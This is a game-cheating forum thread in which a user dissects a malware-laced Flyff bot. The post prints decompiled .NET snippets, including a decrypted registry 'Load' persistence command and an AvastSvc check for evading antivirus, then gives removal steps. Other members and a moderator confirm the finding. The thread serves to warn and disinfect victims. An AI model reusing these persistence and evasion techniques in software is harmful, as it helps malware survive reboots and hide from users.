Register for your free account! | Forgot your password?

Go Back   elitepvpers > MMORPGs > Flyff > Flyff Private Server
You last visited: Today at 04:19

  • Please register to post and access all features, it's quick, easy and FREE!


A warning to those to used General Bot!

Discussion on A warning to those to used General Bot! within the Flyff Private Server forum part of the Flyff category.

Closed Thread
 
Old   #1
 
elite*gold: 20
Join Date: Apr 2015
Posts: 418
Received Thanks: 909
Thumbs up A warning to those to used General Bot!

The users who downloaded the bot from the thread named is infected with some kind of virus.

This thread is probably in the wrong section, however I decided to post it here because the users who downloaded it most likely doesn't check the other sections. Also, the original thread is closed.

It contained the following files:
  • farmbot
    • TargetMinimap.exe (bad boy)
  • config.ini (legit)
  • General Bot.exe (legit)
  • hook.dll (confuse file)
  • interface.asi (confuse file)
  • NeuzInfiltration.dll (confuse file)
  • upgrading.dll (confuse file)

Most of the files being files that adds extra layers of "confusion" on what is happening to prevent suspicion.

hook.dll is most likely not used due to how the bot worked. It worked by pixel scanning and had nothing to do with memory.

interface.asi is most likely not associated with the bot either. I cannot really speak on this however after a little bit of analysis it seems to be a dll regarding sound.

NeuzInfiltration.dll do I have to say anything on this one? No.

upgrading.dll is a dll that has been renamed to confuse the user. It was previously Miles Sound System. Company Name : RAD Game Tools. Inc.

General Bot.exe is the legit thing which contains the au3 script as a resource. Not more to say.

farmbot -> TargetMinimap.exe is however the interesting part of this. It is a software coded in a .NET language which is protected by smartassembly. Some naughty stuff can be found inside of this one.

I have not analysed it throughly, however a couple of things caught my attention.

First thing:
Code:
standardInput.Write(string.Concat(new string[]
{
        Class5.smethod_1("ZoZsR/ZaAWzxqaKwo+nWGkxoLc6Ds9GNObStufkfOT2TLcBbjyvMGWz5Ui7BQiviEu7Vk8MO6FJ1iaMc1ALpfry+mE2yigOyL28GnNKe0ab37UCQ2TsndQdis/7A49IH"),
	"%temp%\\",
	Class5.smethod_1("35HUeD+OlAq9ZwumSXi79g=="),
	"\\",
	Class5.smethod_1("2atqj4HZ4WJ029aPZ3Ly2d46DqSi1+THRQs1q+XH92I="),
	".lnk \" /f",
        Environment.NewLine
}));
After decrypting the strings it show the following:
reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Load /t REG_SZ /d "
FlyFF Bot
generalbotstart.exe


The registry key that the bot adds prevent the startup programs from running when restarting the computer. It can be resolved by deleting the key in registry.

Another thing that caught my attention was the following code:
Code:
if (!Class5.smethod_0(Class5.smethod_1("kH6hMrdds0P1ED86mOaZMg==")))
{
	goto IL_D1;
}
IL_C3:
num2 = 11;
Thread.Sleep(26001);
IL_D1:
The decrypted string contain: AvastSvc
It basically is a bit of code to prevent Avast from detecting it as a virus. It is a known method and can be read on the internet.

It has made of copy of TargetMinimap.exe in the following directory: %temp%\FlyFF Bot
Make sure to delete those files and fix the registry as mentioned above. As I said before, I did not analyse it throughly, I'm sure it contained more bullshit, so watch out boys.

TL;DR
Delete the key named Load in registry located at HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows
Goto %temp%\FlyFF Bot in the file explorer and delete the shortcut and the duplicated virus.


Do not restart your computer before you've done these fixes. Otherwise a empty messagebox will popup and once you hit ok, the virus will kick in and do a bunch of naught stuff.



greyb1t is offline  
Thanks
8 Users
Old 05/15/2017, 14:16   #2
 
elite*gold: 0
Join Date: Feb 2010
Posts: 120
Received Thanks: 64
Quote:
Originally Posted by dosha5 View Post
But no one asked you for help .
And you are not a Moderator to post an useless thing like this .
As i said its a hack section not a scanvirustotal.com .
Learn to know your place little kid.

PS: Hope the Moderator of this section did his job instead of ignoring it because you passed your limits. ^_^
What the f is wrong with you?!

He just wanted to help ppl. who aren´t able to reverse engineer.

Dunno why you are so upset about this. Were you part of this little fishy "bot" ?


Hömer is offline  
Thanks
2 Users
Old 05/15/2017, 15:43   #3
 
elite*gold: 0
Join Date: Apr 2011
Posts: 32
Received Thanks: 3
Quote:
Originally Posted by dosha5 View Post
But no one asked you for help .
And you are not a Moderator to post an useless thing like this .
As i said its a hack section not a scanvirustotal.com .
Learn to know your place little kid.

PS: Hope the Moderator of this section did his job instead of ignoring it because you passed your limits. ^_^
So you think it's fine that there is a public hack released with a virus which could potentially destroy your PC? I hope you aren't that retarded.

This guy is just trying to make others aware. I assume you're working with the guy trying to distribute the virus or something? There's no reason to be angry otherwise, if anything you should be happy.
Exrotz is offline  
Thanks
1 User
Old 05/15/2017, 16:56   #4
 
elite*gold: 0
Join Date: Dec 2012
Posts: 15
Received Thanks: 1
Thanks for the heads up greyb1t!

Also, have you identified the effects of the said virus, when incase, the computer is restarted as the virus "kicks in"?

(I seem to have done it, and I am a bit worried. Sorry for asking too much; I am not as computer savvy as you are.)


Gelz is offline  
Old 05/15/2017, 21:52   #5



 
elite*gold: 61
Join Date: Feb 2011
Posts: 5,804
Received Thanks: 3,337
Arrow Flyff Hacks, Bots, Cheats, Exploits & Macros -> Flyff PServer - D…

I looked into this matter in a secure environment and arrived at the same result which means that greyb1t is right, reinstalling your system is strongly recommended, though.

Needless to say, we will take action against the member who published the said bot. Always be careful of newly registered or relatively unknown members!

Thanks for reporting! @


lestryker is offline  
Thanks
3 Users
Closed Thread

Tags
bot, fix, greyb1t, prevent, virus



« Request Official WdRartesia map | Remove Animation from Skill »

Similar Threads
used king Rammus code OR katarina kitty cat code (KR) → used PAX sivir code (NA / EU)
08/23/2012 - League of Legends Trading - 2 Replies
Hello Korea is my server users. I NA / EU servers have already been used in the "Pax Sivir Code" wants As a reward, "king Rammus code OR Katarina kitty cat code" I will send you to gift. Have already used the code, Feel free to do the exchange! Please send mail [email protected]
used king Rammus code OR katarina kitty cat code (KR) → used PAX sivir code (NA / EU)
08/21/2012 - League of Legends Trading - 1 Replies
your "already used in the NA / EU servers is Pax Sivir Code" Do you have? Want to exchange "Pax Sivir Code" I "king Rammus code OR Katarina kitty cat code" will provide I use this code in the NA / EU servers did not. just. South Korea on a server, you should not use Pax Sivir Code. If you are interested in this deal, contact me. e-mail: [email protected]
used king Rammus code OR katarina kitty cat code (KR) → used PAX sivir code (NA / EU)
08/20/2012 - League of Legends Trading - 0 Replies
Hello Korea is my server users. I NA / EU servers have already been used in the "Pax Sivir Code" wants As a reward, "king Rammus code OR Katarina kitty cat code" I will send you to gift. Have already used the code, Feel free to do the exchange! Please send mail [email protected]
WTT my used eu Pax sivir Skin for a used NA Pax Jay or Pax TF
02/20/2012 - League of Legends Trading - 0 Replies
Topic says it all got used Pax sivir Skin in EU and still usable in NA And i want to Trade for usable EU Pax Jax or Tf skin
Q>For Those who already used the pchack?
05/15/2009 - Grand Chase Philippines - 5 Replies
Can i have some tips? Like the 1hit kill becauze evrytime i scan no result? why why why? :rtfm::rtfm::rtfm: and by the way for those trying to know where i get the pc hack this forum are www._________.com saka d nyu to maiintindihan



All times are GMT +2. The time now is 04:19.


Powered by vBulletin®
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.

BTC: 33E6kMtxYa7dApCFzrS3Jb7U3NrVvo8nsK
ETH: 0xc6ec801B7563A4376751F33b0573308aDa611E05

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2020 elitepvpers All Rights Reserved.